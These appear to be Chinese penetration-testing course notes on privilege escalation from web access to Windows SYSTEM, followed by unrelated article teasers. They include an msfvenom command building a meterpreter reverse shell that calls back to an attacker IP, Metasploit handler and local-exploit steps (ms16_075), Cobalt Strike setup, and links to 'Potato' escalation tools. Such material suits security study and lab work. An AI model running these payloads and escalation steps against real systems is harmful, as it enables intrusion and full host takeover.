Window Linux 权限提升

#基础点:

0、为什么我们要学习权限提升转移技术:

简单来说就是达到目的过程中需要用到它  心里要想着我是谁 我在哪 我要去哪里

1、具体有哪些权限需要我们了解掌握的:

后台权限,数据库权限,Web权限,用户权限,服务器权限,宿主机权限,域控制器权限

2、以上常见权限获取方法简要归类说明:

后台权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成

数据库权限:SQL注入,数据库泄漏,弱口令攻击,未授权访问等造成

Web权限:RCE,反序列化,文件上传等直达或通过后台数据库间接造成

用户权限:弱口令,数据泄漏等直达或通过Web,服务器及域控转移造成

服务器权限:系统内核漏洞,钓鱼后门攻击,主机软件安全直达或上述权限提升造成

宿主机权限:Docker不安全配置或漏洞权限提升直达(服务资产造成入口后提升)

域控制器权限:内网域计算机用户提升或自身内核漏洞,后门攻击,主机软件安全直达

3、以上常见权限获取后能操作的具体事情:

后台权限:文章管理,站点管理,模版管理,数据管理,上传管理等

数据库权限:操作数据库的权限,数据增删改查等(以数据库用户为主)

Web权限:源码查看,源码文件增删改查,磁盘文件文件夹查看(以权限配置为主)

用户权限:就如同自己电脑上普通用户能操作的情况(敏感操作会被禁止)

服务器权限:就如同自己电脑上能操作的情况(整个系统都是你的)

宿主机权限:就如同自己电脑上能操作的情况(整个系统都是你的)

域控制器权限:就如同自己电脑上能操作的情况(整个内网域系统都是你的)

4、以上常见权限在实战中的应用场景介绍:

当我们通过弱口令进入到应用后台管理

当我们下载备份文件获取到数据库信息

当我们通过漏洞拿到资产系统的Web权限

当我们在公司被给予账号密码登录计算机或系统

当我们在公司或钓鱼后门获取到某个公司机器系统

#权限提升-Web应用&中间件&数据库

背景1:通过弱口令进入Web后台系统通过上传获取Web权限

背景2:通过Tomcat弱口令进入控制界面通过上传获取Web权限

背景3:通过Redis未授权进入管理端通过SQL执行获取Web权限

#权限转移-后台管理&数据库管理&Web

Tmall-后台权限->Web权限(提升)

Tmall-Web权限->数据库权限(转移)

Tmall-Web权限->另一个后台权限(转移)

PhpMyadmin-数据管理->Web权限(提升)

PhpMyadmin-Web权限->另一个后台权限(转移)


#Web到Win系统提权-平台&语言&用户

1、Web搭建平台差异

集成软件,自行搭建,虚拟化等

集成软件:宝塔,PhpStudy,XAMMP等

自行搭建:自己一个个下载安装搭建配置

虚拟化:Docker,ESXi,QEMU,Hyper-V等

集成软件大多获得权限后直接就是高权限 除了宝塔有自己的安全策略

自行搭建的不会出先拿到权限后就是高权限的情况

虚拟化需要先逃逸

2、Web语言权限差异

ASP/ASP.NET/PHP/JSP等

权限高低:JSP>ASP.NET>ASP=PHP

JSP的拿到权限后就是高权限不需要再提权  其他语言都需要再提(前提是自行搭建的 如果是集成软件的都不需要再提权了)

原因:语言特性

3、系统用户权限差异

Windows:

System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。

Administrators:管理员组,具有对计算机进行完全访问和操作的权限。

Users:用户组,一般用户的默认组别,拥有较低的系统权限。

Guests:

访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。

Backup Operators:

备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。

Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。

Remote Desktop Users:远程桌面用户组,允许用户进行远程桌面连接。

Network Configuration Operators:网络配置操作员组,允许用户管理网络配置。

Performance Log Users:性能日志用户组,允许用户收集性能日志和计数器数据。

Distributed COM Users:

分布式 COM 用户组,允许用户使用分布式 COM 连接到计算机。

IIS_IUSRS: 用于授权IIS相关服务的用户组。

Windows 权限大概分为四个基本

System是最高权限Administrators其次,再下面就是User,组权限最底的是特殊组如Remote Desktop Users 这种,ASP/ASP.NET/PHP获得的权限就是IIS_IUSRS这个组的。 

Linux:

系统用户:UID(0-999)

普通用户:UID(1000-*)

root用户:UID为0,拥有系统的完全控制权限


#Web到Win-系统提权-宝塔面板-哥斯拉

Windows 2012(宝塔Apache+PHP)-MSF

复现搭建:选择2012系统后自行安装宝塔

PMeterpreter

BypassOpenBaseDir

BypassDisableFunction

#Web到Win-系统提权-溢出漏洞-MSF&CS

Windows 2008(IIS+ASP)-MSF

自行搭建+ASP/PHP+Windows 2008

复现搭建:选择2016系统后自行安装IIS+ASP

0、MSF安装:(也可以用kali)

目前的msf版本有bug可以TB上购买pro版本嘎嘎稳

https://blog.csdn.net/qq_46717339/article/details/122653084

1、生成反弹后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.141 LPORT=3333 -f exe -o msf.exe

2、配置监听会话

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 3333

exploit

2.1、筛选EXP模块

全自动:快速识别系统中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

set showdescription true

3、利用EXP溢出提权

background

use exploit/windows/local/ms16_075_reflection_juicy

set session 1

exploit

Windows 2016(IIS+ASP.NET)-CS

复现搭建:选择2016系统后自行安装IIS+ASP.NET

0、CS安装

chmod +x ./teamserver

chmod +x ./TeamServerImage

./teamserver IP password

1、连接CS

2、创建监听器

3、加载脚本插件


#Web到Win-系统提权-人工操作

如果提权中无法执行命令的话,可以尝试上传cmd.exe到可读写目录再调用

优点:解决实时更新不集成的EXP

缺点:操作繁琐,需要各种复现调试

解决工具或插件无法实时更新,又或者集成较少面对复杂情况下人工操作更适合

1、信息收集

参考常见命令(见上图)

2、补丁筛选

https://i.hacking8.com/tiquan

https://github.com/bitsadmin/wesng

python wes.py systeminfo.txt --color

python wes.py systeminfo.txt --color -i "Elevation of Privilege"

3、EXP获取执行

KernelHub 针对常用溢出编号指定找EXP

Poc-in-Github 针对年份及编号指定找EXP

exploitdb 针对类型及关键说明指定找EXP

https://github.com/Ascotbe/Kernelhub

https://github.com/nomi-sec/PoC-in-GitHub

https://gitlab.com/exploit-database/exploitdb

#Web到Win-系统提权-土豆家族

https://mp.weixin.qq.com/s/OW4ybuqtErh_ovkTWLSr8w

土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,

可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。

1、Test in:Windows 10/111809/21H2)

2、Test in:Windows Server 2019 Datacenter(1809)

3、Test in:Windows Server 2022 Datacenter(21H2)

土豆家族

SweetPotato OK

RoguePotato

BadPotato OK

EfsPotato OK

GodPotato OK

PetitPotato OK

MultiPotato

CandyPotato

RasmanPotato OK

CoercedPotato

JuicyPotatoNG

PrintNotifyPotato OK

GodPotato

https://github.com/BeichenDream/GodPotato

SweetPotato

https://github.com/CCob/SweetPotato

RoguePotato

https://github.com/antonioCoco/RoguePotato

BadPotato

https://github.com/BeichenDream/BadPotato

EfsPotato

https://github.com/zcgonvh/EfsPotato

MultiPotato

https://github.com/S3cur3Th1sSh1t/MultiPotato

CandyPotato

https://github.com/klezVirus/CandyPotato

RasmanPotato

https://github.com/crisprss/RasmanPotato

PetitPotato

https://github.com/wh0amitz/PetitPotato

JuicyPotatoNG

https://github.com/antonioCoco/JuicyPotatoNG

PrintNotifyPotato

https://github.com/BeichenDream/PrintNotifyPotato

CoercedPotato

https://github.com/Prepouce/CoercedPotato

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/636213.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

基于Netty实现WebSocket服务端

本文基于Netty实现WebSocket服务端,实现和客户端的交互通信,客户端基于JavaScript实现。 在【WebSocket简介-CSDN博客】中,我们知道WebSocket是基于Http协议的升级,而Netty提供了Http和WebSocket Frame的编解码器和Handler&#…

Access to image at ‘xxx‘ from origin ‘xxx‘ has been blocked by CORS policy解决方案

如图所示,控制台出现下面的报错: 但是正常加载了图片 这个错误表明你尝试从某个源(origin)加载阿里云上的图片时,浏览器因为CORS(跨源资源共享)策略阻止了这次请求。尽管图片能正常显示&#x…

Midjourney应用场景、特点、生成图片带来影响

Midjourney是一个基于GPT-3.5系列接口开发的免费AI机器人,旨在提供多领域的智能对话服务。本文主要介绍Midjourney的应用场景、功能特点、图片生成后可以做什么? 一、Midjourney应用场景 Midjourney的应用场景相当广泛,以下是一些主要的适用…

迈威通信TSN工业自动化系统解决方案助力智能制造实现确定性服务

工业4.0时代,IT与OT的融合已成为制造企业数字化转型的关键。然而,传统OT网络与IT网络的差异给融合带来了重重挑战。例如,当传送带通过PROFINET协议与HMI通讯时,兼容性问题凸显;硬件实时运动控制采用EtherCAT协议,机械臂…

基于GIS的各类地图样式作品的欣赏,真的不一般。

GIS(地理信息系统)提供了丰富的地图数据,为地图可视化开发提供了基础数据。在GIS的基础上,您可以根据需求和目的,采用不同的可视化样式来展示地图数据。 以下是一些常见的地图可视化样式: 点状标记&#x…

Nat Hum Behav | 人类前额叶皮层非空间注意力的因果相位依赖性控制

摘要 非空间注意力是一种基本的认知机制,它使个体能够将意识的焦点从无关刺激转向与行为目标相关的感觉信息上。有人提出了一种关于注意力是由前额叶皮层中缓慢兴奋性波动的持续相位所调节的假设,但这一假设存在争议且尚未达成共识。在这里,…

angr使用学习

首先我是直接在kali中安装的,也是边练边学的。 嗯,要在纯净python环境,所以是在 virtualenv 虚拟环境里,也不是特别会用这个,按照教程一步步做的 source venv/bin/activate 进入了对应环境 退出是 deactivate en,ipy…

精准控制,无缝集成:EC-Master与LxWin的EtherCAT主站解决方案

在今天,越来越多的制造业客户选择自动化智能化转型,自动化智能化促进了人机交互、数据互通与自动化控制的发展。随着工业4.0和智能制造的推进,对高速、低时延、高性能的需求在自动化控制领域日益增长。 在这一背景下,EtherCAT&am…

C++相关概念和易错语法(14)(初始化注意事项、vector、编译器向上查找规则)

1.当我们在代码中想要终止运行的话,我们可以采用Ctrl C或Ctrl Z,其中^C代表杀进程,^Z设置结束2.编码表:我们目前比较熟悉的是ASCII码编码方式,但是我们发现平时使用的汉字无法通过ASCII编码,除此之外&…

1个逗号,提升Python代码质量

有些时候,我们会在Python代码中看到列表或其他科迭代对象的结尾会存在一个逗号: 而且编辑器和解释器都容许这种逗号的存在,它就叫作拖尾逗号。 通常是为了在频繁地增减数组元素的时候同时保证语法的正确,且拖尾逗号不占用数组的长…

气膜建筑:寿命、优势与应用—轻空间

近年来,气膜建筑因其独特的结构和众多优势,逐渐成为建筑领域的热门选择。气膜建筑使用寿命长,且在建造速度、成本、安全性、节能环保和舒适性等方面具有显著优势。轻空间将详细探讨气膜建筑的使用寿命、主要优势及其在不同领域的广泛应用。 气…

【从C++到Java一周速成】章节10:封装、继承、方法的重写、多态

章节10:封装、继承、方法的重写、多态 【1】封装1.高内聚,低耦合2.代码层面的体现 【2】继承【3】方法的重写【4】多态 【1】封装 1.高内聚,低耦合 高内聚:类的内部数据操作细节自己完成,不允许外部干涉;…

JSX语法看这一篇就够了-02

JSX and React 是相互独立的两种开发语言,它们经常一起使用,但也可以单独使用它们中的任意一个,JSX 是JavaScript 语言的扩展,而 React 则是一个 JavaScript 的库。 概述简介 JSX简介 JSX全称 javascriptXML,是Faceb…

cmake编译redis6.0源码总结

1配置clion使用cygwin模拟linux环境,先下载cygwin后配置 2导入源码,配置cmake文件 由于redis是基于Linux上的Makefile,所以Windows上需要配置CMakeLists.txt使用cmake工具编译运行。github上已经有人尝试编写CMakeLists.txt文件&#xff0c…

软件测评的重要性

软件测评的必要性体现在多个方面,以下是其主要原因: 质量保障:软件测评的首要目标是确保软件的质量。通过系统的测试,可以发现软件中的缺陷、错误或不符合需求的地方,从而及时进行修复和改进。这有助于保证软件在实际…

怎么录制直播视频教程?一看就会的方法分享

随着网络直播的兴起,无论是教学、会议还是娱乐,直播视频已成为人们日常生活和工作中不可或缺的一部分。录制直播视频教程不仅可以帮助我们回顾和分享精彩瞬间,还能为观众提供便捷的学习资源。可是怎么录制直播视频教程呢?本文将介…

轻松同步:将照片从三星手机传输到iPad的简便方法

概括 想要在新 iPad 上查看三星照片吗?但是,如果您不知道如何将照片从三星手机传输到 iPad,则无法在 iPad 上查看图片。为此,本文分享了 7 个有用的方法,以便您可以使用它们在不同操作系统之间轻松发送照片。现在&…

炫酷gdb

在VS里面调试很方便对吧?(F5直接调试,F10逐过程调试--不进函数,F11逐语句调试--进函数,F9创建断点),那在Linux中怎么调试呢? 我们需要用到一个工具:gdb 我们知道VS中程…

ARM-2

c语言实现三盏灯的控制 #ifndef __LED_H__ #define __LED_H__typedef struct {volatile unsigned int MODER;volatile unsigned int OTYPER;volatile unsigned int OSPEEDER;volatile unsigned int PUPDR;volatile unsigned int IDR;volatile unsigned int ODR;volatile unsig…

问题与解决:element ui垂直菜单展开后显示不全

比如我这个垂直菜单展开后,其实系统管理下面还有其他子菜单,但是显示不出来了。 解决方法很简单,只需要在菜单外面包一层el-scrollbar,并且将高度设置为100vh。